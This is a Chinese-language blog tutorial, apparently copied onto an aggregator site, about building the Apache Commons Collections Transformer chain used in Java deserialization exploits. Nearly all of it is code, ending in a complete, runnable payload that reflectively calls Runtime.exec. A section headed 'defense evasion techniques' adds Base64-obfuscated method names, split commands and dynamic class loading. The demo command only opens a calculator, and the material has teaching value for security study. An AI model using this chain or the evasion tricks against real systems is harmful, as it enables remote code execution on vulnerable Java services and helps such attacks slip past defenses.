当前位置: 首页 > news >正文

java反序列化: Transformer链技术剖析

Transformer链是CC反序列化漏洞的"执行引擎",本文聚焦Transformer链的核心原理和实现机制,为后续完整利用链分析奠定基础。


一、Java命令执行与序列化限制

1.1 常规命令执行方式

Java中执行系统命令的标准方法是通过Runtime类:

Runtime.getRuntime().exec("calc.exe");
1.2 序列化的致命限制

Runtime类未实现Serializable接口:

public class Runtime {// 未实现Serializable接口private static Runtime currentRuntime = new Runtime();// ...
}

关键问题:反序列化时无法直接构造Runtime实例执行命令。


二、反射突破序列化限制

通过反射机制可间接调用Runtime:

Class<?> runtimeClass = Class.forName("java.lang.Runtime");
Method getRuntime = runtimeClass.getMethod("getRuntime");
Object runtime = getRuntime.invoke(null);
Method exec = runtimeClass.getMethod("exec", String.class);
exec.invoke(runtime, "calc.exe");

在这里插入图片描述

优势:涉及的所有类(Class、Method)都实现了Serializable接口。


三、Transformer链核心组件

3.1 InvokerTransformer:反射执行引擎
public class InvokerTransformer implements Transformer, Serializable {private final String iMethodName;private final Class[] iParamTypes;private final Object[] iArgs;public Object transform(Object input) {if (input == null) return null;try {Class cls = input.getClass();Method method = cls.getMethod(iMethodName, iParamTypes);return method.invoke(input, iArgs);} catch (Exception e) {throw new FunctorException(...);}}
}
3.2 ConstantTransformer:常量提供器
public class ConstantTransformer implements Transformer, Serializable {private final Object iConstant;public static Transformer getInstance(Object constantToReturn) {return (Transformer)(constantToReturn == null ? NULL_INSTANCE : new ConstantTransformer(constantToReturn));}public Object transform(Object input) {return this.iConstant;// 无视输入,始终返回固定值}}

核心价值:为调用链提供初始对象(如Runtime.class)。

3.3 ChainedTransformer:链式执行器
public class ChainedTransformer implements Transformer, Serializable {private final Transformer[] iTransformers;public Object transform(Object object) {for(int i = 0; i < this.iTransformers.length; ++i) {object = this.iTransformers[i].transform(object);}return object;}
}

链式调用原理

输出1 = 组件1.transform(输入)
输出2 = 组件2.transform(输出1)
...
最终结果 = 组件N.transform(输出N-1)

四、完整Transformer链构造

4.1 分步拆解命令执行
// 1. 获取Runtime.class对象
Object step1 = Runtime.class;// 2. 获取getRuntime方法
Method step2 = step1.getClass().getMethod("getRuntime");// 3. 调用getRuntime()获取Runtime实例
Runtime step3 = (Runtime) step2.invoke(null);// 4. 执行exec方法
step3.exec("calc.exe");
4.2 转换为Transformer实现
Transformer[] chain = new Transformer[]{// 步骤1:获取Runtime.classnew ConstantTransformer(Runtime.class),// 步骤2:反射调用getMethod("getRuntime")new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime", new Class[0]}),// 步骤3:反射调用invoke(null)new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null, new Object[0]}),// 步骤4:调用exec("calc.exe")new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};
4.3 链式执行
public class TransformerDemo {public static void main(String[] args) {ChainedTransformer chain = new ChainedTransformer(transformers);chain.transform(null); // 触发命令执行}
}
4.4 调用链
  Gadget chain:ChainedTransformer.transform()ConstantTransformer.transform()InvokerTransformer.transform()Method.invoke()Class.getMethod()InvokerTransformer.transform()Method.invoke()Runtime.getRuntime()InvokerTransformer.transform()Method.invoke()Runtime.exec()

五、关键技术点解析

5.1 反射执行优势
  • 绕过Runtime的序列化限制
  • 方法调用通过字符串传递,可动态构造
  • 参数类型完全可控
5.2 类型转换处理
// 自动处理类型转换
Object runtime = method.invoke(...); // 返回Object类型
// 下一级Transformer自动接收Object类型输入
5.3 空输入处理
chain.transform(null); 
// ConstantTransformer无视输入,返回Runtime.class
// 后续组件基于前一步输出执行

六、防御规避技巧

6.1 方法名混淆
// 使用Base64编码方法名
String method = new String(Base64.getDecoder().decode("Z2V0UnVudGltZQ=="));
new InvokerTransformer(method, ...);
6.2 命令混淆
// 拆分命令+拼接执行
new InvokerTransformer("exec", new Class[]{String[].class},new Object[]{new String[]{"cmd", "/c", "calc.exe"}}
);
6.3 多态加载
// 通过ClassLoader动态加载
Class cls = Class.forName("java.lang." + "Runtime", true, Thread.currentThread().getContextClassLoader()
);

七、完整Payload示例

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import java.lang.reflect.Method;public class FullTransformerChain {public static void main(String[] args) throws Exception {// 构造Transformer链Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})};// 链式执行ChainedTransformer chain = new ChainedTransformer(transformers);chain.transform(null);}
}

在这里插入图片描述
执行效果:成功弹出计算器程序


八、总结

8.1 核心技术总结
组件作用关键特性
InvokerTransformer反射执行任意方法方法名/参数类型动态指定
ConstantTransformer提供初始对象无视输入,返回固定值
ChainedTransformer链式调用Transformer前序输出作为后续输入
8.2 当前局限
  • 需主动调用transform():反序列化不会自动触发
  • 无隐蔽性:直接包含Runtime等敏感类名
http://www.lqws.cn/news/79723.html

相关文章:

  • 《多状态DP:状态设计与状态转移方程速成指南》​
  • Google 发布的全新导航库:Jetpack Navigation 3
  • 【深度学习新浪潮】以Dify为例的大模型平台的对比分析
  • 【算法】分支限界
  • Python库CloudScraper详细使用(绕过 Cloudflare 的反机器人页面的 Python 模块)
  • 《Pytorch深度学习实践》ch3-反向传播
  • 数字化转型全场景安全解析:从产品到管理的防线构建与实施要点
  • 自适应流量调度用于遥操作:面向时间敏感网络的通信与控制协同优化框架
  • 用wireshark抓包分析学习USB协议
  • 04powerbi-度量值-筛选引擎CALCULATE()
  • 吴恩达MCP课程(5):research_server_prompt_resource.py
  • 光伏功率预测 | BiLSTM多变量单步光伏功率预测(Matlab完整源码和数据)
  • HTML 等价字符引用:系统化记忆指南
  • 网络攻防技术五:网络扫描技术
  • Linux中的mysql逻辑备份与恢复
  • 二叉树的层序遍历与完全二叉树判断
  • HarmonyOS鸿蒙Taro跨端框架
  • 已有的前端项目打包到tauri运行(windows)
  • AI智能体|扣子(Coze)搭建【合同/文档审查】工作流
  • SpringBoot手动实现流式输出方案整理以及SSE规范输出详解
  • 从 LeetCode 到日志匹配:一行 Swift 实现规则识别
  • 【Godot】如何导出 Release 版本的安卓项目
  • Linux服务器安装GUI界面工具
  • Grafana对接Prometheus数据源
  • LlamaIndex的IngestionPipeline添加本地存储(本地文档存储)
  • 【深度学习】实验四 卷积神经网络CNN
  • 记录一次由打扑克牌测试国内各家大模型的经历
  • 2025年5月24日系统架构设计师考试题目回顾
  • 使用 OpenCV (C++) 进行人脸边缘提取
  • 大数据-275 Spark MLib - 基础介绍 机器学习算法 集成学习 随机森林 Bagging Boosting